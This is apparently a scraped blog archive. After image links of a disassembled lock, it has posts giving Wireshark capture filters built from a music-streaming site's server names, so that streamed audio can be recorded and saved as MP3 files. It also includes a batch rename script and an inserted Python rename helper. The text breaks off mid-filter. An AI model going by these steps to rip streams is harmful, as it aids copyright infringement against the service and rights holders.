<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi82KaGXTwr1WdttfpmrIjFKls97rouMhLHYxmcEpaEJbGqN3RNussaHduCAKGilxbQBL7kTqM7DP4vCfiUHl0H50HJg6OULHC4npfQ1nqjVBaw5ct3dyMng_kg45eEXEtUKeuQfrCDEDg/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi82KaGXTwr1WdttfpmrIjFKls97rouMhLHYxmcEpaEJbGqN3RNussaHduCAKGilxbQBL7kTqM7DP4vCfiUHl0H50HJg6OULHC4npfQ1nqjVBaw5ct3dyMng_kg45eEXEtUKeuQfrCDEDg/s320/3.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsHLh3qbf0ZVD-OsnUjmDolPwU7UKgkDxPja5CeUUN0S5lzF2bDXx56QXnNduCnVHQx6un6EFsEJ4yZ_rTYBbN_YlwsKJ1uwUcUoHw9VQaTYwJLwPoXQB9zTBEzy_R_vrPBSSy9mDPlY/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVsHLh3qbf0ZVD-OsnUjmDolPwU7UKgkDxPja5CeUUN0S5lzF2bDXx56QXnNduCnVHQx6un6EFsEJ4yZ_rTYBbN_YlwsKJ1uwUcUoHw9VQaTYwJLwPoXQB9zTBEzy_R_vrPBSSy9mDPlY/s320/4.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnDF7BNKGqTOBCXEAzM7YIjX71zzL_q9om2q7Cx3jcTtHRW49zRbpW5Huz2l2D3POrXVKvxPiDc3SGx6WYgPNc3rc1hAiXbDDaVLeALDbhzfwj8drm34WUUvqjvqq1jYuvfGsLFKSnpts/s1600/5.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnDF7BNKGqTOBCXEAzM7YIjX71zzL_q9om2q7Cx3jcTtHRW49zRbpW5Huz2l2D3POrXVKvxPiDc3SGx6WYgPNc3rc1hAiXbDDaVLeALDbhzfwj8drm34WUUvqjvqq1jYuvfGsLFKSnpts/s320/5.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoEJ_wMrwTYs0QKFo3r8pcpO9orFLEgU-gppXlXg0mUAEDBq76JOnp_mlZtASF54E6w71gJCI1hrL79SHLZZuMoiBZ7GuS78VuMFyn1E5DyrvxTnWI0WE3Czip85cCURq5ylqHBK9Az4Q/s1600/6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoEJ_wMrwTYs0QKFo3r8pcpO9orFLEgU-gppXlXg0mUAEDBq76JOnp_mlZtASF54E6w71gJCI1hrL79SHLZZuMoiBZ7GuS78VuMFyn1E5DyrvxTnWI0WE3Czip85cCURq5ylqHBK9Az4Q/s320/6.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1DaTkDJOZLfYCcTdZ5ArGpWHWe6WAj-VII0nXynTftJewzN9Hjd6IBiIm-y8mlcVfGaPBG3zwA7_Hc92pSaGzBBG0OdWPZCQGNKhHByUIOAVefK6KzWB3QWav1vy6JwR8NAsmoRogKy4/s1600/7.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1DaTkDJOZLfYCcTdZ5ArGpWHWe6WAj-VII0nXynTftJewzN9Hjd6IBiIm-y8mlcVfGaPBG3zwA7_Hc92pSaGzBBG0OdWPZCQGNKhHByUIOAVefK6KzWB3QWav1vy6JwR8NAsmoRogKy4/s320/7.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA_G4YgSsZwPyOEdqj0epAnDYn_5opitW5MyEBOM6Ub-HwSmONK2BEHgg5OHJe_NygJB1w5eclsYsfPV4GgfDhQHSYBou-ua2bfMK05nczae1IZQSXWQU3AsYE9Ha_jf_oIwd2YWgnmko/s1600/8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA_G4YgSsZwPyOEdqj0epAnDYn_5opitW5MyEBOM6Ub-HwSmONK2BEHgg5OHJe_NygJB1w5eclsYsfPV4GgfDhQHSYBou-ua2bfMK05nczae1IZQSXWQU3AsYE9Ha_jf_oIwd2YWgnmko/s320/8.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjze-q_DoL9pwRWjiWRAcPIC6oStAVRQ5yGf_aCFPT4wiSeuaJ8Lot6OxvNF7JJj7NcHz836T_Y-cgnpP0mObAA3okzZ6e2ZwChsdWe7OyiuV1GP3GC0UVzWRA3A2LGNYdSyFvdQo-wLtc/s1600/9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjze-q_DoL9pwRWjiWRAcPIC6oStAVRQ5yGf_aCFPT4wiSeuaJ8Lot6OxvNF7JJj7NcHz836T_Y-cgnpP0mObAA3okzZ6e2ZwChsdWe7OyiuV1GP3GC0UVzWRA3A2LGNYdSyFvdQo-wLtc/s320/9.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdcIOG_xodHuduTIvD6f3VihnfhH-Iy5_UCDsQsqDAnn_ahKi8TGRDNTB3uugG-kKOPwCS_O8hLO4vf1wFzkd5Wq_NR-2Wop3C5aMgXa8caM6p0yWz45Gtybuisxmz0R7r8jJlyOdMCiw/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdcIOG_xodHuduTIvD6f3VihnfhH-Iy5_UCDsQsqDAnn_ahKi8TGRDNTB3uugG-kKOPwCS_O8hLO4vf1wFzkd5Wq_NR-2Wop3C5aMgXa8caM6p0yWz45Gtybuisxmz0R7r8jJlyOdMCiw/s320/10.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8BGNwqdrBFxqUWN1VUifyDiuDSJp3YMU-ANQrvIkHFkZ-77AeFh4ll3PUiQ35D1BRfJxb5fBWrGdEhRaWgHkTW51fadt9Na-j2ADbNAPRT3j7fPjVNdlfMsEfL7bicpbPyx0Vtk5Mu6Q/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8BGNwqdrBFxqUWN1VUifyDiuDSJp3YMU-ANQrvIkHFkZ-77AeFh4ll3PUiQ35D1BRfJxb5fBWrGdEhRaWgHkTW51fadt9Na-j2ADbNAPRT3j7fPjVNdlfMsEfL7bicpbPyx0Vtk5Mu6Q/s320/11.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibLSweBafIYN5F1TW3XSB4DvXxDebxoIMq76J7-lYV7eRnmhWPXUfmkzRGvvGIM5v5I8HmNwfdW_oNwApte1B4ZKoouWTBsADc8NwLa0Nbf04qRRgw95xl7jfx5paGpYIlmBO0Kr_HO5o/s1600/12.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibLSweBafIYN5F1TW3XSB4DvXxDebxoIMq76J7-lYV7eRnmhWPXUfmkzRGvvGIM5v5I8HmNwfdW_oNwApte1B4ZKoouWTBsADc8NwLa0Nbf04qRRgw95xl7jfx5paGpYIlmBO0Kr_HO5o/s320/12.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgff-fvo42ngAVp5SGYgnnURLMJENArnQYyzlLcXCBUGi6k93PfixsXH8pjrrGQIkMrhl4wxNeRRsoYs0Ks4aHx5kmo5xidTN33sfQ3uI4xijlSb7-Ky571tkQAfygFzMqgvFkKy4i1HfQ/s1600/13.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="177" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgff-fvo42ngAVp5SGYgnnURLMJENArnQYyzlLcXCBUGi6k93PfixsXH8pjrrGQIkMrhl4wxNeRRsoYs0Ks4aHx5kmo5xidTN33sfQ3uI4xijlSb7-Ky571tkQAfygFzMqgvFkKy4i1HfQ/s320/13.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVwhX0WWkP5glmlkV_zsjn1dXJ39z4tBDkGcgFVfCrbItGZhWCWUBIRQNwcXuTB-ledoPqq1uP5E70MXU6TU1b14IpjGaycRNpy2FLkl63JHO9NP_qKkhsNdiX8jbTmrkkaKmVY1oolxg/s1600/14.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVwhX0WWkP5glmlkV_zsjn1dXJ39z4tBDkGcgFVfCrbItGZhWCWUBIRQNwcXuTB-ledoPqq1uP5E70MXU6TU1b14IpjGaycRNpy2FLkl63JHO9NP_qKkhsNdiX8jbTmrkkaKmVY1oolxg/s320/14.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB6g3A2rZ4jZkjnsF9Mrz4n1wMoKZRDeTUuHqjRczk_0xWj2sfYs2Z3Z7_L1VmMcKMnrGC6ZivnXZ-9OEwb1jEs7gG-ToTLEv_ZAm2sqXqR5BYGZjJwTuYpX4FzUu54VBAb7wi9DsH-2c/s1600/15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgB6g3A2rZ4jZkjnsF9Mrz4n1wMoKZRDeTUuHqjRczk_0xWj2sfYs2Z3Z7_L1VmMcKMnrGC6ZivnXZ-9OEwb1jEs7gG-ToTLEv_ZAm2sqXqR5BYGZjJwTuYpX4FzUu54VBAb7wi9DsH-2c/s320/15.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7e6-A6B9GMURm31IVOc8UiVVL-6GsA5HuzDJ85OpTcbwz2C-jptinG7j9J-SGNp62eH233uaINbqtaUmUK4kh9YlgidbrxzvUtHzgud4tpkAUkP5al0T-SEkM8uYk3rQtyoCDbtU6NYY/s1600/16.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7e6-A6B9GMURm31IVOc8UiVVL-6GsA5HuzDJ85OpTcbwz2C-jptinG7j9J-SGNp62eH233uaINbqtaUmUK4kh9YlgidbrxzvUtHzgud4tpkAUkP5al0T-SEkM8uYk3rQtyoCDbtU6NYY/s320/16.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkDe1P768mp2Tu0dsf3j2tqow_xy2QE_i60Oyjw01JhCeCJ3D9omONwTEAlM-K8dh-7kv9yWkXHUsoEovv3qzhEQlpZNgu6obb0jb5N__drLA5H4fZEtbgK_486d-n0ofDmUOz2ucqCqo/s1600/17.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkDe1P768mp2Tu0dsf3j2tqow_xy2QE_i60Oyjw01JhCeCJ3D9omONwTEAlM-K8dh-7kv9yWkXHUsoEovv3qzhEQlpZNgu6obb0jb5N__drLA5H4fZEtbgK_486d-n0ofDmUOz2ucqCqo/s320/17.jpg" width="320" /></a></div>
<br />
Here is the full lock disassembled, bottom at the left and top at the right.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6y_PyAyFQ0726YuYuSqc7ZQ4B_NiXjX7bRYv9XXTG5njOWSqMwhPOl1rmdd6WFWEPbToc4en1l-rV7LLdDWau2pI-_SgnRBBUIDsGmVAR9rhd_bNxo7gjCSBq31dVv_MU0s4Y0Lww594/s1600/Total.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6y_PyAyFQ0726YuYuSqc7ZQ4B_NiXjX7bRYv9XXTG5njOWSqMwhPOl1rmdd6WFWEPbToc4en1l-rV7LLdDWau2pI-_SgnRBBUIDsGmVAR9rhd_bNxo7gjCSBq31dVv_MU0s4Y0Lww594/s640/Total.jpg" width="640" /></a></div>
<br />
The bottom half of the lock plates:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8e7dKM-P0RLh6ZADZCFHU2x9Mdhi4u3BCm-bcNW_vsEgWnPH9BoUY3IDduVV4930KXeSFu_ldkpZcfbE_Z2o8dVerVxes3jQoQ_Y4CYOx92n5nholczuoI4-6GhSq7YcMNHhVs4msVyc/s1600/Total+-+left.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8e7dKM-P0RLh6ZADZCFHU2x9Mdhi4u3BCm-bcNW_vsEgWnPH9BoUY3IDduVV4930KXeSFu_ldkpZcfbE_Z2o8dVerVxes3jQoQ_Y4CYOx92n5nholczuoI4-6GhSq7YcMNHhVs4msVyc/s640/Total+-+left.jpg" width="640" /></a></div>
<br />
The top half of the lock plates:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsIg_MKpaswvhuDejYlM_Zc3vk6Xu3hTSNgJ5fmQUa2TfnIbWiuqUl6QHchiSOE1gw4s4EspNLAt9_CVYXvQXPbO545xLfUeJX1yWACgLS19t6xyKHWxD_86GYGfoyU20bwALFcIIFMAI/s1600/Total+-+right.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsIg_MKpaswvhuDejYlM_Zc3vk6Xu3hTSNgJ5fmQUa2TfnIbWiuqUl6QHchiSOE1gw4s4EspNLAt9_CVYXvQXPbO545xLfUeJX1yWACgLS19t6xyKHWxD_86GYGfoyU20bwALFcIIFMAI/s640/Total+-+right.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
Wireshark Filters - For a Different Popular Music Site<br />
Published 2012-06-20T05:03:00.000-10:00, updated 2012-06-21T11:27:20.291-10:00<br />
<br />
Grab music off of a different very popular music site...<br />
<br />
src host s18.first.am or s19.first.am or s20.first.am or s25.first.am or s3.first.am or x1.first.am or x2.first.am or x3.first.am or x4.first.am or s2.first.am or s4.first.am or s5.first.am or s6.first.am or s7.first.am or s8.first.am or s9.first.am or s10.first.am or s11.first.am or s12.first.am or s13.first.am or s14.first.am or s15.first.am or s16.first.am or s17.first.am or x5.first.am or x6.first.am or x7.first.am or x8.first.am or s21.first.am or s22.first.am or s23.first.am or s24.first.am or s26.<br />
<br />
I'll leave it as an exercise to the reader to figure out what the domain name is supposed to be.<br />
<br />
<strike>You're going to end up with all kinds of crap along with what you want. Such as text files, image files, you're looking for audio/mpeg.</strike><br />
Cleaned up the filter. Now it only grabs the audio files.<br />
<br />
I hate doing crap manually, so here's a script to add the extension to the files.<br />
<br />
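-=Script=-<br />
@echo off<br />
rem A literal percent sign must be doubled inside a batch file, or the 2 after it is read as an argument reference<br />
ren *.audio%%2fmpeg *.mp3<br />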
<br />
<strike>Yep that's it, you might have some OBJECT files left over, those are crap, just delete them. There may also be other stuff, I only did a short capture.</strike><br />
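A more general version of the rename step, as an added example that is not from the original post: it decodes the percent-encoded MIME type in each file's suffix, renames only the audio types, leaves leftovers such as OBJECT files alone, and never overwrites an existing file. The MIME-to-extension table, the function names and the sample file names are assumptions made for this example.

```python
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Assumed mapping from decoded MIME type to file extension; extend as needed.
MIME_TO_EXT = {
    "audio/mpeg": ".mp3",
    "audio/mp4": ".m4a",
    "audio/ogg": ".ogg",
}


def plan_renames(directory):
    """Return (old_path, new_path) pairs for files whose suffix is a
    percent-encoded MIME type listed in MIME_TO_EXT."""
    directory = Path(directory)
    # Names already in use, compared case-insensitively so the plan is also
    # safe on case-insensitive filesystems.
    taken = {p.name.lower() for p in directory.iterdir()}
    plan = []
    for path in sorted(directory.iterdir()):
        if not path.is_file() or "." not in path.name:
            continue  # e.g. extension-less OBJECT leftovers
        stem, _, suffix = path.name.rpartition(".")
        # "audio%2fmpeg" and "audio%2Fmpeg" both decode to "audio/mpeg".
        ext = MIME_TO_EXT.get(unquote(suffix).lower())
        if ext is None or not stem:
            continue  # not an encoded audio type: leave the file alone
        candidate = stem + ext
        n = 1
        while candidate.lower() in taken:
            # Never overwrite: pick the next free numbered name instead.
            candidate = f"{stem}_{n}{ext}"
            n += 1
        taken.add(candidate.lower())
        plan.append((path, directory / candidate))
    return plan


def apply_renames(plan):
    """Perform the planned renames and return the new file names."""
    for old, new in plan:
        old.rename(new)
    return [new.name for _, new in plan]


def demo():
    """Run the rename over constructed sample files in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        # Constructed sample names, not taken from a real capture.
        for name in [
            "track1.audio%2fmpeg",
            "track2.audio%2Fmpeg",
            "track2.mp3",          # pre-existing file that must not be overwritten
            "page.text%2fhtml",    # non-audio type, left untouched
            "OBJECT",              # no extension, left untouched
        ]:
            (d / name).write_bytes(b"")
        renamed = apply_renames(plan_renames(d))
        return renamed, sorted(p.name for p in d.iterdir())


if __name__ == "__main__":
    renamed, listing = demo()
    print("renamed:", renamed)
    print("directory now:", listing)
```

Calling `plan_renames()` on its own gives a dry run: it returns the planned old and new paths without touching any file.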
<br />
Open all the files in Winamp and send them to Auto Tag, then use MP3Tag (as was pointed out to me) to rename the files from the metadata.<br />
<br />
Wireshark Filters - For a popular music site<br />
Published 2012-05-31T11:27:00.002-10:00, updated 2012-06-21T07:30:44.123-10:00<br />
<br />
--Updated with a larger list--<br />
<br />
Why not have a massive Wireshark capture filter to capture music from a popular music streaming site? Well, that was my thought. A bit of DNS digging and a refresher on Wireshark capture filter syntax later, and whammo, you get this:<br />
<br />
<br />
server-ph-sv5-42-170.popularmusicsite.com or server-ph-sv5-42-171.popularmusicsite.com or server-ph-sv5-42-172.popularmusicsite.com or server-ph-sv5-42-173.popularmusicsite.com or server-ph-sv5-42-174.popularmusicsite.com or server-ph-sv5-42-175.popularmusicsite.com or server-ph-sv5-42-176.popularmusicsite.com or server-ph-sv5-42-177.popularmusicsite.com or server-ph-sv5-42-178.popularmusicsite.com or server-ph-sv5-42-179.popularmusicsite.com or server-ph-sv5-42-180.popularmusicsite.com or server-ph-sv5-42-181.popularmusicsite.com or server-ph-sv5-42-182.popularmusicsite.com or server-ph-sv5-42-183.popularmusicsite.com or server-ph-sv5-42-184.popularmusicsite.com or server-ph-sv5-42-185.popularmusicsite.com or server-ph-sv5-42-186.popularmusicsite.com or server-ph-sv5-42-187.popularmusicsite.com or server-ph-sv5-42-188.popularmusicsite.com or server-ph-sv5-42-189.popularmusicsite.com or server-ph-sv5-42-190.popularmusicsite.com or server-ph-sv5-42-191.popularmusicsite.com or server-ph-sv5-42-192.popularmusicsite.com or server-ph-sv5-42-193.popularmusicsite.com or server-ph-sv5-42-194.popularmusicsite.com or server-ph-sv5-42-195.popularmusicsite.com or server-ph-sv5-42-196.popularmusicsite.com or server-ph-sv5-42-197.popularmusicsite.com or server-ph-sv5-42-198.popularmusicsite.com or server-ph-sv5-42-199.popularmusicsite.com or server-ph-sv5-42-200.popularmusicsite.com or server-ph-sv5-42-201.popularmusicsite.com or server-ph-sv5-42-202.popularmusicsite.com or server-ph-sv5-42-203.popularmusicsite.com or server-ph-sv5-42-206.popularmusicsite.com or server-ph-sv5-42-208.popularmusicsite.com or server-ph-sv5-42-209.popularmusicsite.com or server-ph-sv5-42-210.popularmusicsite.com or server-ph-sv5-42-211.popularmusicsite.com or server-ph-sv5-42-212.popularmusicsite.com or server-ph-sv5-42-214.popularmusicsite.com or server-ph-sv5-42-215.popularmusicsite.com or server-ph-sv5-42-216.popularmusicsite.com or server-ph-sv5-42-217.popularmusicsite.com or 
server-ph-sv5-42-218.popularmusicsite.com or server-ph-sv5-42-219.popularmusicsite.com or server-ph-sv5-42-220.popularmusicsite.com or server-ph-sv5-42-221.popularmusicsite.com or server-ph-sv5-42-222.popularmusicsite.com or server-ph-sv5-42-223.popularmusicsite.com or server-ph-sv5-42-224.popularmusicsite.com or server-ph-sv5-42-225.popularmusicsite.com or server-ph-sv5-42-226.popularmusicsite.com or server-ph-sv5-42-228.popularmusicsite.com or server-ph-sv5-42-229.popularmusicsite.com or server-ph-sv5-42-230.popularmusicsite.com or server-ph-sv5-42-231.popularmusicsite.com or server-ph-sv5-42-232.popularmusicsite.com or server-ph-sv5-42-233.popularmusicsite.com or server-ph-sv5-42-234.popularmusicsite.com or server-ph-sv5-42-235.popularmusicsite.com or server-ph-sv5-42-236.popularmusicsite.com or server-ph-sv5-42-237.popularmusicsite.com or server-ph-sv5-42-238.popularmusicsite.com or server-ph-sv5-42-239.popularmusicsite.com or server-ph-sv5-42-240.popularmusicsite.com or server-ph-sv5-42-241.popularmusicsite.com or server-ph-sv5-42-242.popularmusicsite.com or server-ph-sv5-42-243.popularmusicsite.com or server-ph-sv5-42-244.popularmusicsite.com or server-ph-sv5-42-245.popularmusicsite.com or server-ph-sv5-42-246.popularmusicsite.com or server-ph-sv5-42-247.popularmusicsite.com or server-ph-sv5-42-248.popularmusicsite.com or server-ph-sv5-42-249.popularmusicsite.com or server-ph-sv5-42-250.popularmusicsite.com or server-ph-sv5-42-251.popularmusicsite.com or server-ph-sv5-42-252.popularmusicsite.com or server-ph-sv5-42-253.popularmusicsite.com or server-ph-sv5-42-254.popularmusicsite.com or future-208-85-43-1.popularmusicsite.com or server-ph-sv5-43-2.popularmusicsite.com or server-ph-sv5-43-3.popularmusicsite.com or server-ph-sv5-43-4.popularmusicsite.com or server-ph-sv5-43-5.popularmusicsite.com or server-ph-sv5-43-6.popularmusicsite.com or server-ph-sv5-43-8.popularmusicsite.com or server-ph-sv5-43-10.popularmusicsite.com or 
server-ph-sv5-43-11.popularmusicsite.com or server-ph-sv5-43-12.popularmusicsite.com or server-ph-sv5-43-13.popularmusicsite.com or server-ph-sv5-43-14.popularmusicsite.com or server-ph-sv5-43-15.popularmusicsite.com or server-ph-sv5-43-16.popularmusicsite.com or server-ph-sv5-43-17.popularmusicsite.com or server-ph-sv5-43-19.popularmusicsite.com or server-ph-sv5-43-20.popularmusicsite.com or server-ph-sv5-43-21.popularmusicsite.com or server-ph-sv5-43-22.popularmusicsite.com or server-ph-sv5-43-23.popularmusicsite.com or server-ph-sv5-43-24.popularmusicsite.com or server-ph-sv5-43-25.popularmusicsite.com or server-ph-sv5-43-26.popularmusicsite.com or server-ph-sv5-43-27.popularmusicsite.com or server-ph-sv5-43-28.popularmusicsite.com or server-ph-sv5-43-29.popularmusicsite.com or server-ph-sv5-43-30.popularmusicsite.com or server-ph-sv5-43-31.popularmusicsite.com or server-ph-sv5-43-33.popularmusicsite.com or server-ph-sv5-43-34.popularmusicsite.com or server-ph-sv5-43-35.popularmusicsite.com or server-ph-sv5-43-36.popularmusicsite.com or server-ph-sv5-43-37.popularmusicsite.com or server-ph-sv5-43-38.popularmusicsite.com or server-ph-sv5-43-39.popularmusicsite.com or server-ph-sv5-43-40.popularmusicsite.com or server-ph-sv5-43-41.popularmusicsite.com or server-ph-sv5-43-42.popularmusicsite.com or server-ph-sv5-43-43.popularmusicsite.com or server-ph-sv5-43-44.popularmusicsite.com or server-ph-sv5-43-45.popularmusicsite.com or server-ph-sv5-43-47.popularmusicsite.com or server-ph-sv5-43-48.popularmusicsite.com or server-ph-sv5-43-49.popularmusicsite.com or server-ph-sv5-43-50.popularmusicsite.com or server-ph-sv5-43-51.popularmusicsite.com or server-ph-sv5-43-52.popularmusicsite.com or server-ph-sv5-43-53.popularmusicsite.com or server-ph-sv5-43-54.popularmusicsite.com or server-ph-sv5-43-55.popularmusicsite.com or server-ph-sv5-43-56.popularmusicsite.com or server-ph-sv5-43-57.popularmusicsite.com or server-ph-sv5-43-58.popularmusicsite.com or 
server-ph-sv5-43-59.popularmusicsite.com or server-ph-sv5-43-60.popularmusicsite.com or server-ph-sv5-43-61.popularmusicsite.com or server-ph-sv5-43-62.popularmusicsite.com or server-ph-sv5-43-63.popularmusicsite.com or server-ph-sv5-43-64.popularmusicsite.com or server-ph-sv5-43-65.popularmusicsite.com or server-ph-sv5-43-66.popularmusicsite.com or server-ph-sv5-43-68.popularmusicsite.com or server-ph-sv5-43-69.popularmusicsite.com or server-ph-sv5-43-71.popularmusicsite.com or server-ph-sv5-43-74.popularmusicsite.com or server-ph-sv5-43-75.popularmusicsite.com or server-ph-sv5-43-76.popularmusicsite.com or server-ph-sv5-43-77.popularmusicsite.com or server-ph-sv5-43-78.popularmusicsite.com or server-ph-sv5-43-79.popularmusicsite.com or server-ph-sv5-43-80.popularmusicsite.com or server-ph-sv5-43-81.popularmusicsite.com or server-ph-sv5-43-82.popularmusicsite.com or server-ph-sv5-43-83.popularmusicsite.com or server-ph-sv5-43-84.popularmusicsite.com or server-ph-sv5-43-85.popularmusicsite.com or server-ph-sv5-43-86.popularmusicsite.com or server-ph-sv5-43-87.popularmusicsite.com or server-ph-sv5-43-88.popularmusicsite.com or server-ph-sv5-43-89.popularmusicsite.com or server-ph-sv5-43-90.popularmusicsite.com or server-ph-sv5-43-91.popularmusicsite.com or server-ph-sv5-43-92.popularmusicsite.com or server-ph-sv5-43-93.popularmusicsite.com or server-ph-sv5-43-94.popularmusicsite.com or server-ph-sv5-43-95.popularmusicsite.com or server-ph-sv5-43-96.popularmusicsite.com or server-ph-sv5-43-97.popularmusicsite.com or server-ph-sv5-43-99.popularmusicsite.com or server-ph-sv5-43-100.popularmusicsite.com or server-ph-sv5-43-101.popularmusicsite.com or server-ph-sv5-43-102.popularmusicsite.com or server-ph-sv5-43-103.popularmusicsite.com or server-ph-sv5-43-105.popularmusicsite.com or server-ph-sv5-43-106.popularmusicsite.com or server-ph-sv5-43-107.popularmusicsite.com or server-ph-sv5-43-109.popularmusicsite.com or server-ph-sv5-43-110.popularmusicsite.com or 
server-ph-sv5-43-111.popularmusicsite.com or server-ph-sv5-43-112.popularmusicsite.com or server-ph-sv5-43-113.popularmusicsite.com or server-ph-sv5-43-114.popularmusicsite.com or server-ph-sv5-43-115.popularmusicsite.com or server-ph-sv5-43-116.popularmusicsite.com or server-ph-sv5-43-117.popularmusicsite.com or server-ph-sv5-43-118.popularmusicsite.com or server-ph-sv5-43-119.popularmusicsite.com or server-ph-sv5-43-120.popularmusicsite.com or server-ph-sv5-43-121.popularmusicsite.com or server-ph-sv5-43-122.popularmusicsite.com or server-ph-sv5-43-123.popularmusicsite.com or server-ph-sv5-43-124.popularmusicsite.com or server-ph-sv5-43-125.popularmusicsite.com or server-ph-sv5-43-126.popularmusicsite.com or server-ph-sv5-43-127.popularmusicsite.com or server-ph-sv5-43-128.popularmusicsite.com or server-ph-sv5-43-129.popularmusicsite.com or server-ph-sv5-43-130.popularmusicsite.com or server-ph-sv5-43-131.popularmusicsite.com or server-ph-sv5-43-132.popularmusicsite.com or server-ph-sv5-43-133.popularmusicsite.com or server-ph-sv5-43-134.popularmusicsite.com or server-ph-sv5-43-136.popularmusicsite.com or server-ph-sv5-43-137.popularmusicsite.com or server-ph-sv5-43-138.popularmusicsite.com or server-ph-sv5-43-139.popularmusicsite.com or server-ph-sv5-43-141.popularmusicsite.com or server-ph-sv5-43-142.popularmusicsite.com or server-ph-sv5-43-143.popularmusicsite.com or server-ph-sv5-43-145.popularmusicsite.com or server-ph-sv5-43-146.popularmusicsite.com or server-ph-sv5-43-147.popularmusicsite.com or server-ph-sv5-43-148.popularmusicsite.com or server-ph-sv5-43-151.popularmusicsite.com or server-ph-sv5-43-152.popularmusicsite.com or server-ph-sv5-43-153.popularmusicsite.com or server-ph-sv5-43-154.popularmusicsite.com or server-ph-sv5-43-155.popularmusicsite.com or server-ph-sv5-43-156.popularmusicsite.com or 